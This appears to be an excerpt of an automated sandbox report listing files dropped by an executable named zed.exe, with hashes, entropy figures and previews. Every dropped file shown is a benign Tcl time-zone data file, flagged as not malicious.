                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVnCMPfXHAIgoqkCM4ARL/yQahDZALMFB5h8Qa5CMS:SlSWB9vsM3ym5XPHAIgo5gAN/y7D17/f
                                                                                                                                                                                                                                            MD5:CED145F8D9B231234E021D2214C1064B
                                                                                                                                                                                                                                            SHA1:7B111DC24CA01C78A382CECD3247CF495D71CD34
                                                                                                                                                                                                                                            SHA-256:F511A80AB70FF93A0EB9F29293F73DF952B773BB33EB85D581E4FB1FE06E4F05
                                                                                                                                                                                                                                            SHA-512:E2323C04BF99909ABA9A09A66F9B4696519B5F9FE3AF178FB04D5E0053F41CAA8B937DC4148954ED093D317F454E0547786BEC934F2ABF22A60AAA6A24E63BF9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Zurich)]} {.. LoadTimeZoneFile Europe/Zurich..}..set TZData(:Europe/Busingen) $TZData(:Europe/Zurich)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8096
                                                                                                                                                                                                                                            Entropy (8bit):3.7635458172251406
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:jXSsijEpkv2XkN8qc/OyEie8hF5WQ9VX/Zs1cw27oXqdCA5XqjqFLigTE9s5VpJ:jXS+WeUqKie8hF5f9PwdXM9
                                                                                                                                                                                                                                            MD5:E7F52393523729CA3916768B3F3B4E55
                                                                                                                                                                                                                                            SHA1:1524A3E610DCD33AC0006946BAB2929CA7F5A33F
                                                                                                                                                                                                                                            SHA-256:2BD1C0AB412A5E9C97F533C4D06B773D045215B92568A4E89ADC93C7462D62EC
                                                                                                                                                                                                                                            SHA-512:218674ECD9FD6C1A1C83EE69AFE6AA5AD0D5A8BB59FF497FDF2573B7CF52DAE98ECE0815CF99668CA4E172FF67D220B227369865076333B3EE802A8839C65279
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Chisinau) {.. {-9223372036854775808 6920 0 LMT}.. {-2840147720 6900 0 CMT}.. {-1637114100 6264 0 BMT}.. {-1213148664 7200 0 EET}.. {-1187056800 10800 1 EEST}.. {-1175479200 7200 0 EET}.. {-1159754400 10800 1 EEST}.. {-1144029600 7200 0 EET}.. {-1127700000 10800 1 EEST}.. {-1111975200 7200 0 EET}.. {-1096250400 10800 1 EEST}.. {-1080525600 7200 0 EET}.. {-1064800800 10800 1 EEST}.. {-1049076000 7200 0 EET}.. {-1033351200 10800 1 EEST}.. {-1017626400 7200 0 EET}.. {-1001901600 10800 1 EEST}.. {-986176800 7200 0 EET}.. {-970452000 10800 1 EEST}.. {-954727200 7200 0 EET}.. {-927165600 10800 1 EEST}.. {-898138800 7200 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-800154000 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):185
                                                                                                                                                                                                                                            Entropy (8bit):4.925156646979837
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/y+YF3vXHAIgoq8yFRRL/yQagKVihh8Qahyuv:SlSWB9vsM3ymhVoPHAIgoh6N/yy87Fv
                                                                                                                                                                                                                                            MD5:3AEDE4B340D0250D496C49CADBA04E62
                                                                                                                                                                                                                                            SHA1:C466D8275C465752F5B024615268F6D1CBBA4B41
                                                                                                                                                                                                                                            SHA-256:2B9A0F1775355E311FB63903E3829F98B5F6C73C08F1BECE1A2D471ACC2673E3
                                                                                                                                                                                                                                            SHA-512:2B08B57D58699C65A9AAA43AC87F29DD1EDCBA9F91E79DF4B1E07832032F5B03A43847E20345484730E8D2323199E7439D8C1FC662E812E8BA6EE19C53C89681
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Berlin)]} {.. LoadTimeZoneFile Europe/Berlin..}..set TZData(:Europe/Copenhagen) $TZData(:Europe/Berlin)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):9810
                                                                                                                                                                                                                                            Entropy (8bit):3.7678769652077873
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:sExxHZiMU8EKTy74jT56XdEN1+UZBdMN186LPR:sEzZiMUZ6y0jT5bZHMN186LPR
                                                                                                                                                                                                                                            MD5:E1EB426EA3351AF0D7D563006F9146BC
                                                                                                                                                                                                                                            SHA1:1E94F3B38366FE43BB031A57D19894B569EBABED
                                                                                                                                                                                                                                            SHA-256:895957521D6CA4DE7E4089DC587A6C177B803D8ADF63303B1F85DEB279726324
                                                                                                                                                                                                                                            SHA-512:8F24E9519F5D42F34AEE5C52A94CAC7D035EAE7B31DC3E629C29CFE3BD85F1510188290D35CD327492A030168443FED8BD80EC57ED27811B786C4DC89B4B1181
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Dublin) {.. {-9223372036854775808 -1521 0 LMT}.. {-2821649679 -1521 0 DMT}.. {-1691962479 2079 1 IST}.. {-1680471279 0 0 GMT}.. {-1664143200 3600 1 BST}.. {-1650146400 0 0 GMT}.. {-1633903200 3600 1 BST}.. {-1617487200 0 0 GMT}.. {-1601848800 3600 1 BST}.. {-1586037600 0 0 GMT}.. {-1570399200 3600 1 BST}.. {-1552168800 0 0 GMT}.. {-1538344800 3600 1 BST}.. {-1522533600 0 0 GMT}.. {-1517011200 0 0 IST}.. {-1507500000 3600 1 IST}.. {-1490565600 0 0 IST}.. {-1473631200 3600 1 IST}.. {-1460930400 0 0 IST}.. {-1442786400 3600 1 IST}.. {-1428876000 0 0 IST}.. {-1410732000 3600 1 IST}.. {-1396216800 0 0 IST}.. {-1379282400 3600 1 IST}.. {-1364767200 0 0 IST}.. {-1348437600 3600 1 IST}.. {-1333317600 0 0 IST}.. {-1315778400 3600 1 IST}.. {-1301263200 0 0 IST}.. {-1284328800 3600 1 IST}.. {-1269813600 0 0 IST}.. {-1253484000 3600 1 IST
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):9509
                                                                                                                                                                                                                                            Entropy (8bit):3.8837074152297704
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:QTOKVA1oCobz0W4x2+ZE74elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNA:QyoCvTZ641sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:D04F8EDDA1C3611692FB91E317CCADFE
                                                                                                                                                                                                                                            SHA1:1C483FC95459EC6F1D5FE4DD275879A9EBCA1718
                                                                                                                                                                                                                                            SHA-256:0524A31131405347C1D5D86C5EE38A2064AB055C030AB3B43F25DB3B28FFD8D2
                                                                                                                                                                                                                                            SHA-512:4E2E18EBDE2765F2251B1FE41EF8E6AC79875617348974A28619F5E59EC0467239C682CCE8DEBD7A698BE2F00252C77D1F7FA50B6CAFF920B3BE53A0B836F815
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Gibraltar) {.. {-9223372036854775808 -1284 0 LMT}.. {-2821649916 0 0 GMT}.. {-1691964000 3600 1 BST}.. {-1680472800 0 0 GMT}.. {-1664143200 3600 1 BST}.. {-1650146400 0 0 GMT}.. {-1633903200 3600 1 BST}.. {-1617487200 0 0 GMT}.. {-1601848800 3600 1 BST}.. {-1586037600 0 0 GMT}.. {-1570399200 3600 1 BST}.. {-1552168800 0 0 GMT}.. {-1538344800 3600 1 BST}.. {-1522533600 0 0 GMT}.. {-1507500000 3600 1 BST}.. {-1490565600 0 0 GMT}.. {-1473631200 3600 1 BST}.. {-1460930400 0 0 GMT}.. {-1442786400 3600 1 BST}.. {-1428876000 0 0 GMT}.. {-1410732000 3600 1 BST}.. {-1396216800 0 0 GMT}.. {-1379282400 3600 1 BST}.. {-1364767200 0 0 GMT}.. {-1348437600 3600 1 BST}.. {-1333317600 0 0 GMT}.. {-1315778400 3600 1 BST}.. {-1301263200 0 0 GMT}.. {-1284328800 3600 1 BST}.. {-1269813600 0 0 GMT}.. {-1253484000 3600 1 BST}.. {-1238364000 0 0 GMT}
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):183
                                                                                                                                                                                                                                            Entropy (8bit):4.879252060643389
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVxKL823vXHAIgoqyKL8H6RL/yQakQAL/yQavKL81n:SlSWB9vsM3ymvKA2PHAIgovKAH6N/yYU
                                                                                                                                                                                                                                            MD5:07AF23DA01CB963EA9E57534E34E7704
                                                                                                                                                                                                                                            SHA1:1C4A214FF3B722E80C0ECACA0FFD5DFF302F6AE9
                                                                                                                                                                                                                                            SHA-256:F7046808A8E80B7AE449D1A49AE3E480096736B7D3F554A240C7DFB10F82076A
                                                                                                                                                                                                                                            SHA-512:713860D340C0EBA5EEF873ECB9B28CCDE9BFAD31B6A8626EF507E96585F5CC1091BF8D8A2DB7E5CB532E44F4561FBAE1797141724EF934755B69919FEA09A78A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/London)]} {.. LoadTimeZoneFile Europe/London..}..set TZData(:Europe/Guernsey) $TZData(:Europe/London)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7368
                                                                                                                                                                                                                                            Entropy (8bit):3.7258352536809705
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:OsR0uO7DVopaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBKb0hzj:OkyDjivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                                            MD5:7FF902B06FA79F14553670A70E77FF8C
                                                                                                                                                                                                                                            SHA1:0105051541F38956EA6192BD0C7ED4047668005E
                                                                                                                                                                                                                                            SHA-256:5B5C0A9261A414EA8DC34F594EE05BEE16F695488B230857D2B569A6B603BC39
                                                                                                                                                                                                                                            SHA-512:551940199783A0FF9D73695B77B10300644F50E91D6B02FE79BB0CD4B78C7BA88CCE56F4B9408EC146361BF408F52D01A1F435183360C801EA5E219FB718247F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Helsinki) {.. {-9223372036854775808 5989 0 LMT}.. {-2890258789 5989 0 HMT}.. {-1535938789 7200 0 EET}.. {-875671200 10800 1 EEST}.. {-859773600 7200 0 EET}.. {354672000 10800 1 EEST}.. {370396800 7200 0 EET}.. {386121600 10800 1 EEST}.. {401846400 7200 0 EET}.. {410220000 7200 0 EET}.. {417574800 10800 1 EEST}.. {433299600 7200 0 EET}.. {449024400 10800 1 EEST}.. {465354000 7200 0 EET}.. {481078800 10800 1 EEST}.. {496803600 7200 0 EET}.. {512528400 10800 1 EEST}.. {528253200 7200 0 EET}.. {543978000 10800 1 EEST}.. {559702800 7200 0 EET}.. {575427600 10800 1 EEST}.. {591152400 7200 0 EET}.. {606877200 10800 1 EEST}.. {622602000 7200 0 EET}.. {638326800 10800 1 EEST}.. {654656400 7200 0 EET}.. {670381200 10800 1 EEST}.. {686106000 7200 0 EET}.. {701830800 10800 1 EEST}.. {717555600 7200 0 EET}.. {733280400 10800 1 EEST}.. {749
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):186
                                                                                                                                                                                                                                            Entropy (8bit):4.914274131294981
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVxKL823vXHAIgoqyKL8H6RL/yQaqpfioxp8QavKLS:SlSWB9vsM3ymvKA2PHAIgovKAH6N/ycS
                                                                                                                                                                                                                                            MD5:F9A0F19FAF3131D8A70C50FF21B365B7
                                                                                                                                                                                                                                            SHA1:7FC2B5302FAD06BC4C633CD22A80A7D40073FFF8
                                                                                                                                                                                                                                            SHA-256:2F1151B0528A5325443379D4E7CCE32C00213722AD9DF764E1DC90198084B076
                                                                                                                                                                                                                                            SHA-512:6D04DF4480FE132A6641C4BF7E01936E2E4A71A3A6C2AB9F7DA7A9D8A4B836BC66EE2BB597B8C318D07A06F72C05B07E6785B53308ED9BC1103AE6DBDD0FF24E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/London)]} {.. LoadTimeZoneFile Europe/London..}..set TZData(:Europe/Isle_of_Man) $TZData(:Europe/London)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3683
                                                                                                                                                                                                                                            Entropy (8bit):3.814835316757376
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:Qi0p05zvSPBUUl0ZFzo4ay0CREDcxn6nH78BV0QbCgkCPviiM0H7hdli80+j7x9L:Qiq66OFEIFMssCfMsXV3heM2MRlA0
                                                                                                                                                                                                                                            MD5:A8256656B971F58CB991BC270BF93B26
                                                                                                                                                                                                                                            SHA1:189796E1B8E29A7A7B8B0E143DD9B44BAF217AB2
                                                                                                                                                                                                                                            SHA-256:08061A80FC0F1EF375EEFE784EACDF0812E289FD67E8613BDEC36209985CA1D7
                                                                                                                                                                                                                                            SHA-512:1F11308B5BAC1F3DB75CAC7322BBEA6E51C6B4A2A3450F1DB84DE6AA127F0F1BAA7DAB409FAF1288C100BDA77DA6FA1C6E3C0BA962F9406D1445D7C9E2AA3A60
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Istanbul) {.. {-9223372036854775808 6952 0 LMT}.. {-2840147752 7016 0 IMT}.. {-1869875816 7200 0 EET}.. {-1693706400 10800 1 EEST}.. {-1680490800 7200 0 EET}.. {-1570413600 10800 1 EEST}.. {-1552186800 7200 0 EET}.. {-1538359200 10800 1 EEST}.. {-1522551600 7200 0 EET}.. {-1507514400 10800 1 EEST}.. {-1490583600 7200 0 EET}.. {-1440208800 10800 1 EEST}.. {-1428030000 7200 0 EET}.. {-1409709600 10800 1 EEST}.. {-1396494000 7200 0 EET}.. {-931053600 10800 1 EEST}.. {-922676400 7200 0 EET}.. {-917834400 10800 1 EEST}.. {-892436400 7200 0 EET}.. {-875844000 10800 1 EEST}.. {-764737200 7200 0 EET}.. {-744343200 10800 1 EEST}.. {-733806000 7200 0 EET}.. {-716436000 10800 1 EEST}.. {-701924400 7200 0 EET}.. {-684986400 10800 1 EEST}.. {-670474800 7200 0 EET}.. {-654141600 10800 1 EEST}.. {-639025200 7200 0 EET}.. {-622087200 10800 1 EEST}.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):181
                                                                                                                                                                                                                                            Entropy (8bit):4.8801202136140915
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVxKL823vXHAIgoqyKL8H6RL/yQap6cEBx/yQavKLS:SlSWB9vsM3ymvKA2PHAIgovKAH6N/yzx
                                                                                                                                                                                                                                            MD5:FE10770868A75F4F8D76C5E23D99AA81
                                                                                                                                                                                                                                            SHA1:30AC768BA47AF7A53831F5142B58ECEC41933621
                                                                                                                                                                                                                                            SHA-256:97EB33915ED7C9C34144F8F42357FAB2262B3CD45287F3CFFD26C33D65F7651E
                                                                                                                                                                                                                                            SHA-512:1D82DF45AB0CCDFBFAD0431C668794996E01776800F34DD4131C5287D37291657A749D497AA5B0AB81CAFF3190896633FBFF456BFFEB7E93A3420AA841E54842
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/London)]} {.. LoadTimeZoneFile Europe/London..}..set TZData(:Europe/Jersey) $TZData(:Europe/London)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2512
                                                                                                                                                                                                                                            Entropy (8bit):3.941165221943348
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:coNlj+X2uxhuHJkw0QqXknzaVV04v3TfdGY3kNmneVuNlh000sGpdh:coN9+1EpkwCXkSV3A8qc0
                                                                                                                                                                                                                                            MD5:104CCB93300F40BAF8F4D7CC882EFC05
                                                                                                                                                                                                                                            SHA1:EA83F3C3791BD6F083844939DC405B248E738FE3
                                                                                                                                                                                                                                            SHA-256:2387D26DF5429DF9867F42F7D4F872DC146643B4B3CC57DA7298C18561DE8BFE
                                                                                                                                                                                                                                            SHA-512:12724C5BBEE0835626A98B66BF55C3DF1311F07018C70D76FC5C50E7E7BA5C4A9F064D9EDC376CC3B06C4FFFECA3FAF5B66948615A03DFECA7C361E326D950EA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Kaliningrad) {.. {-9223372036854775808 4920 0 LMT}.. {-2422056120 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-938905200 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-780368400 7200 0 EET}.. {-778730400 10800 1 EEST}.. {-762663600 7200 0 EET}.. {-749095200 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):173
                                                                                                                                                                                                                                            Entropy (8bit):4.970386708540243
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV2cvXHAIgoq1csFARL/yQaoM2EBUQaocqn:SlSWB9vsM3ym5HAIgoiAN/yOEBUC
                                                                                                                                                                                                                                            MD5:74ACF46A3248341CFD84B1592F884A8F
                                                                                                                                                                                                                                            SHA1:888FBB54381A1B5BC19E65AF38A1913635A8E7E4
                                                                                                                                                                                                                                            SHA-256:05C55F87182F0D5D3E8E6C1F9164EDDBDB8035146A0955C04283BC1347D45B30
                                                                                                                                                                                                                                            SHA-512:21A752390E023CBD582BC43865D43458B44B036299A2373948269196071742ED7EB6067DD9A288F3A15E808B452FE4192750FAE813F70738FAB0C866219D57CB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Kyiv)]} {.. LoadTimeZoneFile Europe/Kyiv..}..set TZData(:Europe/Kiev) $TZData(:Europe/Kyiv)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2029
                                                                                                                                                                                                                                            Entropy (8bit):3.668326642402654
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:FFvCAs6kKR6aQmF1cSNWrI+AjXgV/Ap40FjDM:FhCAs6kC6aZF1cSN4I+AjXgV/ApDFjDM
                                                                                                                                                                                                                                            MD5:57BB199152815B12FE4491C92FE25186
                                                                                                                                                                                                                                            SHA1:7BC5ECDE9EFADE812AF40CB92CCE5323FB57C78D
                                                                                                                                                                                                                                            SHA-256:60884D4B8B17A9AB8FB5697DA95F62E570755348109C661D783D56CD047BBE9E
                                                                                                                                                                                                                                            SHA-512:2043FDBA860E8F6578F7E26A80C7787B82C7D15188327923EC36D153FDF9BEEAE063012ACE4309B76DB9DBA2DFFB7404DE370BA85023CCE93159FCAD3B9B92B5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Kirov) {.. {-9223372036854775808 11928 0 LMT}.. {-1593820800 10800 0 +03}.. {-1247540400 14400 0 +05}.. {354916800 18000 1 +05}.. {370724400 14400 0 +04}.. {386452800 18000 1 +05}.. {402260400 14400 0 +04}.. {417988800 18000 1 +05}.. {433796400 14400 0 +04}.. {449611200 18000 1 +05}.. {465343200 14400 0 +04}.. {481068000 18000 1 +05}.. {496792800 14400 0 +04}.. {512517600 18000 1 +05}.. {528242400 14400 0 +04}.. {543967200 18000 1 +05}.. {559692000 14400 0 +04}.. {575416800 18000 1 +05}.. {591141600 14400 0 +04}.. {606866400 10800 0 +04}.. {606870000 14400 1 +04}.. {622594800 10800 0 +03}.. {638319600 14400 1 +04}.. {654649200 10800 0 +03}.. {670374000 14400 0 +04}.. {701820000 10800 0 +04}.. {701823600 14400 1 +04}.. {717548400 10800 0 +03}.. {733273200 14400 1 +04}.. {748998000 10800 0 +03}.. {764722800 14400 1 +04}.. {78044
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7455
                                                                                                                                                                                                                                            Entropy (8bit):3.7624983280224953
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:vC1LyEpkv8V3MpaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBKb4:vC9VW0bivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                                            MD5:F37C7529B53C4C158341AF90F80C3A11
                                                                                                                                                                                                                                            SHA1:210650A882350D35C72A934749F276C58C572DFA
                                                                                                                                                                                                                                            SHA-256:591264F69DB19DDCDC90E704525E2D3D3984117B710F482F19DA8F88628EE6A7
                                                                                                                                                                                                                                            SHA-512:F23B0C5251EB7418A1C80344AB7623D2A0197E681E3B7D152E416187BF66DE09A7A60A65F8ED6A810272CF0C253D63684F08AF594A8C22ABEA89E3BBADC8F0A0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Kyiv) {.. {-9223372036854775808 7324 0 LMT}.. {-2840148124 7324 0 KMT}.. {-1441159324 7200 0 EET}.. {-1247536800 10800 0 MSK}.. {-892522800 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-825382800 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10800 0 MSK}.. {606870000 14400 1 MSD}.. {622594800 10800 0 MSK}.. {638319600 14400 1 MSD}.. {646786800 10800 1 EEST}.. {686102400 7200 0 EET}.. {701827200 10800 1 EEST}.. {7175
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):9878
                                                                                                                                                                                                                                            Entropy (8bit):3.8275310275285723
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:j76abXsyZLEjx82YbtIaFF1w0us4qE3+sSGjT:j77bXsyZLEjx82atysLE3+sSGjT
                                                                                                                                                                                                                                            MD5:0DA331C2A815739E6758797BD24554EA
                                                                                                                                                                                                                                            SHA1:3829C441E908BEFDC4ED6AB65FD4ACD0C97D5E1B
                                                                                                                                                                                                                                            SHA-256:9FAC9812411F88014779D34722F3E0D2750E45BF21595DF1AE14CB9CCFD3F33F
                                                                                                                                                                                                                                            SHA-512:FEBBA05F64AC1F3066AF6351493DD89768154FD171D447503DAEDB90D16858BEDBCE4A74E24AC0C37B5FF191692AF44AADDE4A92E752F88C48DA646352AD9A0B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Lisbon) {.. {-9223372036854775808 -2205 0 LMT}.. {-2713908195 -2205 0 LMT}.. {-1830384000 0 0 WET}.. {-1689555600 3600 1 WEST}.. {-1677801600 0 0 WET}.. {-1667437200 3600 1 WEST}.. {-1647738000 0 0 WET}.. {-1635814800 3600 1 WEST}.. {-1616202000 0 0 WET}.. {-1604365200 3600 1 WEST}.. {-1584666000 0 0 WET}.. {-1572742800 3600 1 WEST}.. {-1553043600 0 0 WET}.. {-1541206800 3600 1 WEST}.. {-1521507600 0 0 WET}.. {-1442451600 3600 1 WEST}.. {-1426813200 0 0 WET}.. {-1379293200 3600 1 WEST}.. {-1364778000 0 0 WET}.. {-1348448400 3600 1 WEST}.. {-1333328400 0 0 WET}.. {-1316394000 3600 1 WEST}.. {-1301274000 0 0 WET}.. {-1284339600 3600 1 WEST}.. {-1269824400 0 0 WET}.. {-1221440400 3600 1 WEST}.. {-1206925200 0 0 WET}.. {-1191200400 3600 1 WEST}.. {-1175475600 0 0 WET}.. {-1127696400 3600 1 WEST}.. {-1111971600 0 0 WET}.. {-1096851
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):190
                                                                                                                                                                                                                                            Entropy (8bit):4.948438246006353
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/sUE2tovXHAIgoq8sUE2oAovRL/yQavPSJ5Qahs0:SlSWB9vsM3ymhrE2tSHAIgohrE2LovNl
                                                                                                                                                                                                                                            MD5:56C6C95484FEAF9BAF755683E7417B58
                                                                                                                                                                                                                                            SHA1:A43176BEBC5B4D7144A7E1109E0AAEFD95C21EC6
                                                                                                                                                                                                                                            SHA-256:713A842197516D618F2D86977262542A1CA334D7DF6026539FA2F2980DBF4CD3
                                                                                                                                                                                                                                            SHA-512:566B6DF2D76A8A4D3405C4785C7A471A23D65CD8838831BD0DEDF5BF194E8A3B304CA9920CB4A8EC9D6CD60EAA9BE0335E38D9547A4D23C7E4E5E5A39A09DDAC
                                                                                                                                                                                                                                            Malicious:false
